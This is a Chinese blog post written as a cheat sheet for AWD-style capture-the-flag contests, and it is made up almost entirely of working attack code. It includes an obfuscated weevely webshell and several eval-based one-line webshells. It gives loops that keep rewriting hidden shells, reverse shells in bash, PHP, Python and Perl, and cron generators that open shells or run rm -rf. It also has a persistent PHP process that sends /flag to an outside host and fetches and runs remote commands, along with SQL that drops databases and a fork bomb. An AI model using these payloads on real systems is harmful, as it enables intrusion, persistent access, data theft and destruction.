Ethan's Blog

AWD线下备忘录

字数统计: 2.2k阅读时长: 11 min
2019/04/02 Share
前言

AWD模式是一个非常有意思的比赛模式,其过程也是惊险刺激!今天主要对后门进行一个汇总!

[TOC]

weevely后门
  1. 优点在于混淆性高,其他选手很难通过分析代码获得weevely型后门的密钥。另外,weevely内置了一些基础的小功能,使用起来也相对方便。

  2. 缺点便是通过php解析执行,执行速度较慢。

  3. 生成weevely后门:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    # moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:10:27] C:2
    $ python weevely.py generate woaizhongguo weevely.php
    Generated backdoor with password 'woaizhongguo' in 'weevely.php' of 1469 byte size.

    # moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:10:50]
    $ cat weevely.php
    <?php
    $u='$kh="-Y6471";$kf="-Y2151-Y";f-Yunction -Yx($t,$-Yk)-Y{$c=-Yst-Yrle-Yn($k);$-Yl=strlen($t);$-Yo';
    $h='.$k-Yf),-Y0,3));$p=-Y"";f-Yor($z=1;-Y$z<coun-Yt($-Ym[1]);-Y$z++-Y)$-Yp.=$q-Y[$m-Y[2][$z]];if-Y(';
    $s='-Ys-Ytrpos(-Y$p,$h)===0){$s[-Y$i]="";$-Yp=$-Yss($p-Y,3);}if(a-Yrra-Yy_ke-Yy_exists($i,-Y$s)){$s[';
    $j=';}}re-Yturn $o-Y;-Y-Y}$r=$_SERVER-Y;$rr=@$r[-Y-Y"HTTP_REFER-YER"];$-Yra=@$r-Y[-Y"HT-YTP_ACC';
    $C='o-Y-Ympress(@x(-Y@b-Yase64_decode-Y(-Y-Ypreg_replace(a-Yrray("/-Y-Y_/","-Y/-/"-Y),array(-Y"/","+"),';
    $W=');$q=array_value-Ys-Y($q);preg_-Ymatch_all(-Y"-Y/([-Y\\w])[\\w-]+(?:-Y;q=0.(-Y-Y[\\d-Y]))?,-Y?/",';
    $G=str_replace('N','','cNNreate_NfNuncNtiNon');
    $c='$ra-Y,$m);if-Y($q-Y-Y&&$m){@s-Yession_start();$s=&$_-YSESS-YION;$ss-Y="subs-Ytr-Y";$-Ysl="-Ys';
    $e='tr-Ytolowe-Yr";$i=$-Ym[1][-Y0].$m[1][-Y1]-Y;$h=$sl($ss(md5($i.-Y$kh-Y),0,-Y3));$f=$sl($s-Ys(-Ymd5($i';
    $M='$i-Y].=$p;$e-Y=strpo-Ys($s-Y[$-Yi],$f);-Yif($e){$k-Y=-Y$-Ykh.$kf;ob_start-Y();@e-Yval(@gzunc';
    $f='-Y4_enc-Yode(x(g-Yzcompres-Y-Ys($o)-Y,$k));p-Yrint("<$k-Y>$d</-Y$-Yk>");@session_-Ydestro-Yy();}}}}';
    $B='$ss-Y($s[$i],-Y0,$e)))-Y,$-Yk)-Y)-Y);$o=ob_get_conten-Yts();ob-Y-Y_e-Ynd_clean();$d=ba-Yse6';
    $g='=""-Y;for($i=0;$i<$l;-Y){-Yfo-Yr($j=0;($j<$-Yc&&$i<-Y$l)-Y;$j-Y++,$i++)-Y{$o.=$t{$i-Y}^$k{$-Yj}';
    $x='-YEPT_LANGUAGE"];if-Y($-Yrr&&$ra)-Y{$u=p-Y-Yarse_-Yurl-Y($rr-Y);parse_str-Y($u["quer-Yy"]-Y-Y,$q';
    $S=str_replace('-Y','',$u.$g.$j.$x.$W.$c.$e.$h.$s.$M.$C.$B.$f);
    $o=$G('',$S);$o();
    ?>
  4. 使用weevely后门

    将其上传到指定web目录后,使用方式如下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    # moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:14:15]
    $ python weevely.py http://202.112.51.135:8801/Myself/weevely.php woaizhongguo

    [+] weevely 3.5

    [+] Target: 202.112.51.135:8801
    [+] Session: /Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session

    [+] Browse the filesystem or execute commands starts the connection
    [+] to the target. Type :help for more information.

    weevely> ls
    antsword.php
    k.php
    reverse.php
    weevely.php
    www-data@9b275645e178:/var/www/html/Myself $ whoami
    www-data
    www-data@9b275645e178:/var/www/html/Myself $

    这样就能得到www-data的一个类shell界面。

  5. load_session连接

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    # moxiaoxi @ moxiaoxideMacBook-Pro in ~/Desktop/Myself/weevely3 [22:15:54] C:2
    $ python weevely.py session /Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session

    [+] weevely 3.5

    [+] Target: 202.112.51.135:8801
    [+] Session: /Users/moxiaoxi/.weevely/sessions/202.112.51.135/weevely_0.session

    [+] Browse the filesystem or execute commands starts the connection
    [+] to the target. Type :help for more information.

    weevely> ls
    antsword.php
    k.php
    reverse.php
    weevely.php
    www-data@9b275645e178:/var/www/html/Myself $
蚁剑及菜刀型后门
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
$white_ip_list = array(
'127.0.0.1',
"::1"
);
$ip = $_SERVER['REMOTE_ADDR'];
if(count($white_ip_list)>0) {
if (in_array($ip, $white_ip_list)) {
$a = $_POST['moxiaoxi'];
if (isset($a)) {
eval($a);
}
}else{
echo('IP:'.$ip);
}
}

用以连接后,以Gui方式运维。

常用的特殊webshell

控制用的一句话木马,最好是需要菜刀配置的,这样做是为了不让别人轻易的利用你的一句话,要不然就只能等着别人用你的脚本捡分。
简单举例:
<?php ($_=@$GET[2]).@$($_POST[1])?>
连接方式:php?2=assert密码是1。
献上我常用得一句话

1
2
3
4
5
6
7
8
<?php
$a=chr(96^5);
$b=chr(57^79);
$c=chr(15^110);
$d=chr(58^86);
$e='($_REQUEST[C])';
@assert($a.$b.$c.$d.$e);
?>

配置为?b=))99(rhC(tseuqeR+lave

1
2
3
<?php
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}
?>

配置填n985de9=QGV2YWwoJF9QT1NUWzBdKTs=
连接密码:0(零)

权限维持
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
set_time_limit(0);
ignore_user_abort(true);

$file = '.conifg.php';
$shell = "<?php echo system("curl 10.0.0.2"); ?>";

while(true){
file_put_contents($file, $shell);
system('chmod 777 .demo.php');

usleep(50);
}
?>

tips:.config.php前面使用一个点,能很好的隐藏文件

反弹shell

在bash下可以运行:

1
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

使用php:

1
php -r '$sock=fsockopen("127.0.0.1","4444");exec("/bin/sh -i <&3 >&3 2>&3");'

使用python:

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_REAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

使用perl:

1
perl -e 'use Socket;$i="127.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Crontab
  • 查看定时任务

    cat /etc/crontab*crontab -l

  • crontab备份

    crontab -l > $HOME/mycron

  • 删除crontab(www-data种植,www-data清理)

    1
    crontab -r
  • crontab执行任意命令

    1
    2
    3
    4
    5
    6
    7
    import base64
    def crontab_reverse(cmd):
    crontab_path = "/tmp"
    crontab_cmd = "* * * * * bash -c '%s'\n"%cmd
    encode_crontab_cmd = base64.b64encode(crontab_cmd)
    cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf"+ " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf"
    return cmd
  • crontab反弹shell

    1
    2
    3
    4
    5
    6
    7
    8
    import base64
    def crontab_reverse(reverse_ip,reverse_port):
    crontab_path = "/tmp"
    cmd = 'bash -i >& /dev/tcp/%s/%d 0>&1'%(reverse_ip , reverse_port)
    crontab_cmd = "* * * * * bash -c '%s'\n"%cmd
    encode_crontab_cmd = base64.b64encode(crontab_cmd)
    cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf"+ " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf"
    return cmd
    1
    2
    3
    4
    ubuntu@ubuntu-virtual-machine:~$ /bin/echo KiAqICogKiAqIGJhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTI3LjAuMC4xLzgwODAgMD4mMScK | /usr/bin/base64 -d | /bin/cat >> /tmp/tmp.conf ; /usr/bin/crontab /tmp/tmp.conf
    ubuntu@ubuntu-virtual-machine:~$
    ubuntu@ubuntu-virtual-machine:~$ crontab -l
    * * * * * bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1'
  • crontab删除文件

    1
    2
    3
    4
    5
    6
    7
    8
    import base64
    def crontab_rm(rm_paths='/var/www/html/'):
    crontab_path = "/tmp"
    cmd = '/bin/rm -rf %s'%rm_paths
    crontab_cmd = "* * * * * %s\n"%cmd
    encode_crontab_cmd = base64.b64encode(crontab_cmd)
    cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf" + " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf"
    return cmd
  • crontab提交flag

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import base64
    def crontab_flag_submit(flag_server,flag_port,flag_url,flag_token,flag_path):
    crontab_path = '/tmp'
    cmd = '/usr/bin/wget "http://%s:%s/%s" -d "token=%s&flag=$(/bin/cat %s)" ' %(flag_server,flag_port,flag_url,flag_token,flag_path)
    crontab_cmd = "* * * * * %s\n"%cmd
    encode_crontab_cmd = base64.b64encode(crontab_cmd)
    cmd = "/bin/echo " + encode_crontab_cmd + " | /usr/bin/base64 -d | /bin/cat >> " + crontab_path + "/tmp.conf" + " ; " + "/usr/bin/crontab " + crontab_path + "/tmp.conf"
    return cmd

    cmd = crontab_flag_submit(flag_server='172.16.132.2',flag_port='8088',flag_url='submit',flag_token='bcbe3365e6ac95ea2c0343a2395834dd',flag_path='/flag')
    print(cmd)
PHP型内存马

内存马,通俗讲就是不死马,就是会运行一段永远不退出的程序常驻在PHP进程里,无限执行。要杀死这种内存马,在root权限下只需要重启Apache或者nginx即可。而在线下赛中,我们往往没有root权限。因此,我们一般得通过www-data用户进行杀马。

杀马,kill -9 -1 杀死所有子进程(杀死当前用户所有进程,有权限下慎用),也可以直接killall apache2。这种操作并不会kill掉apache主进程,因为内存马是Apache启动的一个子进程;

ps -aux|grep ‘www-data’|awk ‘{print $2}’|xargs kill -9

  1. 回送flag+自动提交flag+回连任意代码执行

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    <?php
    $message="* * * * * curl 192.168.136.1:8098/?flag=$(cat /flag)&token=7gsVbnRb6ToHRMxrP1zTBzQ9BeM05oncH9hUoef7HyXXhSzggQoLM2uXwjy1slr0XOpu8aS0qrY";
    ignore_user_abort(true);
    set_time_limit(0);
    while (true) {
    $x =file_get_contents('/flag');
    file_get_contents('http://192.168.136.1:8099/test.php?token=moxiaoxi&flag='.$x);
    sleep(5);
    system("echo '$message' > /tmp/1 ;");
    system("crontab /tmp/1;");
    system("rm /tmp/1;");
    $c=file_get_contents('http://192.168.136.1:8100/1.txt');
    system($c);
    }
    ?>
  2. 覆盖写

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    <?php
    ignore_user_abort(true);
    set_time_limit(0);
    while (1){
    $path = "/var/www/html/css/.moxiaoxi2.php";
    $data = "<?php @eval(\$_POST['moxiaoxi']);?>";
    @file_put_contents($path, $data);
    system('chmod 777 '.$path);
    usleep(100);
    }
    ?>

    这里讲一下二进制马,我至今还没找到那种可以动态变pid,而且执行速度超快的二进制马。所以,在当下看来,二进制马作用其实不大,因为所有的二进制马都可以通过杀死内存马的方式杀掉,就显得很鸡肋。如果后面发现了这种快速执行的骚马,可以拿出来讲一讲。

其他
  1. 数据库相关

    删除数据库

    1
    2
    3
    4
    5
    6
    7
    8
    import base64
    def rm_db(db_user,my_db_passwd):
    cmd = "/usr/bin/mysql -h localhost -u%s %s -e '"%(db_user,my_db_passwd)
    db_name = ['performance_schema','mysql','flag']
    for db in db_name:
    cmd += "drop database %s;"%db
    cmd += "'"
    return cmd

    修改用户信息

    1
    2
    3
    4
    5
    6
    update mysql.user set authentication_string=PASSWORD('hi23333');# 修改所有用户密码
    flush privileges;
    UPDATE mysql.user SET User='aaaaaaaaaaaa' WHERE user='root';
    flush privileges;
    delete from mysql.user ;#删除所有用户
    flush privileges;
  2. fork炸弹

    1
    /bin/echo '.() { .|.& } && .' > /tmp/aaa;/bin/bash /tmp/aaa;
  3. 滥用杀死不死马脚本,不停kill apache2,造成dos

  4. 大量发送长度超长的脚本,造成dos

  5. mysql sleep型dos

  6. 所有的正向shell可以自己写一段简单的python脚本进行控制与管理,而反向shell可以使用王一航写的反向shell管理器.现在的反向shell管理器还存在一些bug。

  7. ….

CATALOG
  1. 1. 前言
  2. 2. weevely后门
  3. 3. 蚁剑及菜刀型后门
  4. 4. 常用的特殊webshell
  5. 5. 权限维持
  6. 6. 反弹shell
  7. 7. Crontab
  8. 8. PHP型内存马
  9. 9. 其他